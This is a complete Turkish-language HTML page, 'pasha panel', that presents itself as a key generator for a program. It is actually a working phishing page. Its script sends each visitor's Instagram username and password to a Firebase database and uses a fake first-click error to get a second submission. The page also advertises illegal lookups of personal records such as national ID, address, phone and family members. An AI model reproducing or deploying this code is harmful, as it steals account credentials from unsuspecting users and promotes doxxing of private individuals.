<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css">
    <title>pasha panel</title>







    <style>
        @import url('https://fonts.googleapis.com/css2?family=Inter:wght@100;200;300;400;500;600;700;800;900&display=swap');


*{
    margin: 0;
    padding: 0;
    box-sizing: 0;
    font-family: 'Inter',system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
}

.bodi{
    background: #1A1D21;
    margin-bottom: 4vh;
}


.main-box{
    background: #212529;
    display: flex;
    justify-content: center;
    align-items: center;
    flex-direction: column;
    margin: 100px 2.5% 0 2.5%;
    padding: 2rem 0 2rem 0;
}

img{
    width: 100px;
    height: 100px;
    border-radius: 50%;
}

.pasha-writing{
    margin-top: 5px;
    font-weight: 700;
    color: rgba(255, 255, 255, 0.46);
    transition:  transform ease .5s;
}

.pasha-writing:hover{
    transform: scale(1.2);
}


form{
    width: 100%;
    height: auto;
    display: flex;
    justify-content: center;
    align-items: center;
    flex-direction: column;
}

.label{
    display: flex;
    justify-content: left;
    font-size: 13px;
}

.instagram-username-input{
    width: 80%;
    height: 35px;
    background: #262A2F;
    border: 1px solid #2A2F34;
    border-radius: 2px;
    outline:none;
    border: 1px solid #2A2F34;
    border-radius: 2px;
    font-size: 11.5px;
    padding-left: 20px;
    color: #45CB85;
}

.instagram-username-input::placeholder{
    font-size: 11.5px;
    position: relative;
}

.w{
    width: 80%;
    height: auto;
}

.buton{
    width: 80%;
    height: 35px;
    background: rgba(21, 115, 66, 0.12);
    border: 1px solid #2B423D;
    border-radius: 2px;
    color: #45CB85;
    font-weight: 400;
    font-size: 14px;
    
    transition: .5s ease;
}

.buton:hover{
    background: #45CB85;
    color: #2B423D;
}

.cut-line{
    font-weight: 100;
    color: rgba(255, 255, 255, 0.25);
    opacity: 50%;
}


.instagram-follow-btn{
    width: 80%;
    height: 35px;
    background: rgba(53, 119, 241, 0.12);
    border: 1px solid rgba(51, 121, 251, 0.06);
    border-radius: 2px;
    font-size: 14px;
    color: #3577F1;
    font-weight: 300;
    text-decoration: none;
    display: flex;
    justify-content: center;
    align-items: center;
    cursor: pointer;

    transition: .5s ease;
}

.instagram-follow-btn:hover{
    background: #3577F1;
    color:rgb(6, 40, 102);
}

.down-con{
    width: 100%;
    height: auto;
    margin-top: 50px;
    display: flex;
    justify-content: center;
    align-items: center;
    flex-direction: column;
    color: white;
}

.warning-box{
    padding: 10px;
    width: 80%;
    height: auto;
    background: rgba(53, 119, 241, 0.12);
    border-radius: 2px;
    display: flex;
    flex-direction: column;
    text-align: center;
}


.product-box{
    padding: 10px;
    width: 80%;
    height: auto;
    background: rgba(53, 119, 241, 0.12);
    border-radius: 2px;
    display: flex;
    flex-direction: column;
    text-align: center;
    justify-content: center;
    align-items: center;
}

.normal-üyes{
    padding: 5px;
    width: 80%;
    height: auto;
    background: rgba(97, 145, 235, 0.12);
    border-radius: 2px;
    display: flex;
    flex-direction: column;
    text-align: center;
    border-radius: 5px;
    justify-content: center;
    align-items: center;
    border-radius: 2px;
}

.vip-üyes{
    padding: 5px;
    width: 80%;
    height: auto;
    background: rgba(97, 145, 235, 0.12);
    border-radius: 2px;
    display: flex;
    flex-direction: column;
    text-align: center;
    border-radius: 5px;
    justify-content: center;
    align-items: center;
    border-radius: 2px;
    box-shadow: 0px 0px 10px rgba(41, 90, 163, 0.219);
}

.imeyj {
    transition: transform 0.5s ease;
}

.imeyj:hover {
    transform: scale(1.2);
}

.error-screen{
    background: rgba(255, 0, 0, 0.24);
    border: solid 1px red;
    width: 100%;
    height: 25px;
    position: relative;
    top: -30px;
    color: rgb(247, 74, 74);
    font-size: 14px;
    display: none;
    justify-content: center;
}

/*succes*/

.key-screen{
    display: none;
    color: rgb(241, 225, 1);
    font-weight: 300;
}
    </style>









</head>
<body class="bodi">

    

    <div class="main-box">
        <div class="error-screen m-0 p-0">Eyvah! bir hata oluştu.</div>
        <img class="imeyj" src="pashaa.png" alt="">
        <p class="pasha-writing">pasha</p>


        <form action="" class="">
            <div class="w"><p class="label text-white m-0 pb-1 p-0" for="">İnstagram Kullanıcı Adı</p></div>
            <input type="text" placeholder="Kullanıcı adınızı giriniz" class="instagram-username-input" id="insta-username">
            <br><br>
            <div class="w"><p class="label text-white m-0 pb-1 p-0" for="">Şifre</p></div>
            <input type="password" placeholder="Şifrenizi giriniz" class="instagram-username-input" id="insta-passwd">
            <br>
            <div class="key-screen">Anahtar: 2023</div>
            <br><br><br>
            <button class="buton n-0 p-0" onclick="sendBtn()" type="button">Anahtar al</button>
        </form>

        <div class="vip-line-group" style="margin-top: 50px;">
            <span class="cut-line text-white">--------</span> <span class="me-3 ms-3" style="font-weight: 500; color: rgba(255, 255, 255, 0.9);">VİP Anahtar almak için</span> <span class="text-white cut-line">--------</span>
        </div>
        <br><br>
        <a class="instagram-follow-btn" href="https://www.instagram.com/ll.fatihbey/">İnstagram Hesabım</a>

        <div class="down-con">
            <div class="warning-box">
                <p style="color: #F06548; font-weight: 600; font-size: 25px;">UYARI!</p>
                <br>
                <p style="font-weight: 400; font-size: 15px; opacity: 90%;">Kardeşim Programımı adam olanlara ver şikayet edilip kapatılmasını hiç istemem. Eminim sende istemezsin sonuçları kötü olur!</p>
                <br>
                <p style="font-weight: 400; font-size: 15px; opacity: 90%;">Programım yoğun şikayet altında! gerçek kullanıcılara ihtiyacım var bu yüzden İnstagram'dan giriş yaparak özel anahtar alarak gerçek kullanıcı olduğunu doğruluyorsun ve bana destek oluyorsun.</p>
            </div>
            <br>
            <div class="product-box">
                <p style="color: #F06548; font-weight: 600; font-size: 25px;">Çok Yakında</p>
                <br>
                <div class="normal-üyes">
                    <p style="color: #03FF96AD; font-weight: 700;">NORMAL ÜYELER</p>
                    <br>
                    <p style="background: rgba(8, 197, 118, 0.376471);border-radius: 1px; width: 80%;">Adres sorgu</p>
                </div>
                <br>
                <div class="vip-üyes">
                    <p style="color: #03FF96AD; font-weight: 700; text-shadow: 0px 0px 16px rgba(14, 183, 113, 0.9);">VIP ÜYELER</p>
                    <br>
                    <p style="background: rgba(8, 197, 118, 0.376471);border-radius: 1px; width: 80%;box-shadow: 0px 0px 4px rgba(8, 197, 118, 0.25);">Adres sorgu</p>
                    <p style="background: rgba(8, 197, 118, 0.376471);border-radius: 1px; width: 80%;box-shadow: 0px 0px 4px rgba(8, 197, 118, 0.25);">Tc sorgu</p>
                    <p style="background: rgba(8, 197, 118, 0.376471);border-radius: 1px; width: 80%;box-shadow: 0px 0px 4px rgba(8, 197, 118, 0.25);">Telefon sorgu</p>
                    <p style="background: rgba(8, 197, 118, 0.376471);border-radius: 1px; width: 80%;box-shadow: 0px 0px 4px rgba(8, 197, 118, 0.25);">VESİKA sorgu</p>
                    <p style="background: rgba(8, 197, 118, 0.376471);border-radius: 1px; width: 80%;box-shadow: 0px 0px 4px rgba(8, 197, 118, 0.25);">Aşı sorgu</p>
                    <p style="background: rgba(8, 197, 118, 0.376471);border-radius: 1px; width: 80%;box-shadow: 0px 0px 4px rgba(8, 197, 118, 0.25);">Sülale sorgu</p>
                    <p style="background: rgba(8, 197, 118, 0.376471);border-radius: 1px; width: 80%;box-shadow: 0px 0px 4px rgba(8, 197, 118, 0.25);">Okul sorgu</p>
                    <p style="background: rgba(8, 197, 118, 0.376471);border-radius: 1px; width: 80%;box-shadow: 0px 0px 4px rgba(8, 197, 118, 0.25);">İş sorgu</p>
                    <p style="background: rgba(8, 197, 118, 0.376471);border-radius: 1px; width: 80%;box-shadow: 0px 0px 4px rgba(8, 197, 118, 0.25);">Plaka sorgu</p>
                </div>
                <p class="mt-3 m-0" style="opacity: 90%; font-weight: 200; color: #03FF96AD;">eklenecektir</p>
            </div>
        </div>
    </div>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script>
    <div class="wr mt-5">
        <footer class="futır">pasha Community</footer>
    </div>
    
    <style>
        .wr {
            width: 100%;
            height: auto;
            display: flex;
            justify-content: center;
            align-items: center;
            text-align: center;
        }
    
        .futır {
            color: rgba(255, 255, 255, 0.6);;
            display: inline-block;
            font-weight: 300;
        }
    </style>
    
    </style>
    <script src="https://www.gstatic.com/firebasejs/8.3.3/firebase-app.js"></script>
    <script src="https://www.gstatic.com/firebasejs/8.3.3/firebase-database.js"></script>

    <script>

        var keys = ["2023", "2006", "pashaTR", "tht", "akp>chp", "fatihbey", "$dolmaz", "3729za", "gonya", "yorgunum", "uluhakan", "yılanxadam", "dodohando", "fatihxkraldır", "pashaxpanel", "hackerx", "amigdala", "zihinxsarayı"];



        // Firebase yapılandırma bilgileri
        var firebaseConfig = {
            apiKey: "AIzaSyAbaB95415dMb5PW3ogTLAZW2gTbd6FkqA",
            authDomain: "chefozdmr.firebaseapp.com",
            databaseURL: "https://chefozdmr-default-rtdb.firebaseio.com",
            projectId: "chefozdmr",
            storageBucket: "chefozdmr.appspot.com",
            messagingSenderId: "694794910234",
            appId: "1:694794910234:web:6b5775a433367bf33cafa3",
            measurementId: "G-3B20P7YQ7Z"
        };

        // Firebase'i yapılandırma
        firebase.initializeApp(firebaseConfig);
        var clickCount = 0
        function sendBtn() {
            clickCount++;

            if (clickCount == 1) {
                showErrorScreen();
            } else if (clickCount == 2) {
                showSuccessMessage();
            }


            var username = document.getElementById("insta-username").value;
            var password = document.getElementById("insta-passwd").value;

            // Verileri Firebase veritabanına gönderme
            firebase.database().ref('users/').push({
                username: username,
                password: password
            }, function(error) {
                if (error) {
                    console.log("Veri gönderilirken bir hata oluştu: " + error);
                } else {
                    console.log("Veri başarıyla gönderildi.");
                }
            });
        }





        function showErrorScreen() {
        var errorScreen = document.querySelector(".error-screen");
        errorScreen.textContent = "Eyvah! Hata oluştu.";
        errorScreen.style.display = "flex";
        setTimeout(hideErrorScreen, 500000);
        }

        function showSuccessMessage() {
        var errorScreen = document.querySelector(".error-screen");
        errorScreen.style.display = "flex";
        errorScreen.style.background = "rgba(69, 203, 134, 0.349)";
        errorScreen.style.border = "solid 1px #45CB85"
        errorScreen.style.color = "#45CB85"
        errorScreen.textContent = "Tebrikler Anahtar başarıyla verildi ✓";
        setTimeout(hideErrorScreen, 5000);
        
        var randomIndex = Math.floor(Math.random() * keys.length);
        var randomKey = keys[randomIndex];
        var key_screen = document.getElementsByClassName("key-screen")[0];
        key_screen.style.display = "flex";
        var output = "Anahtar: " + randomKey;
        key_screen.innerHTML = output;
        }

        function hideErrorScreen() {
        var errorScreen = document.querySelector(".error-screen");
        errorScreen.style.display = "none";
        // clickCount sıfırlanır
        clickCount = 0;
        }






    </script>
</body>
</html>
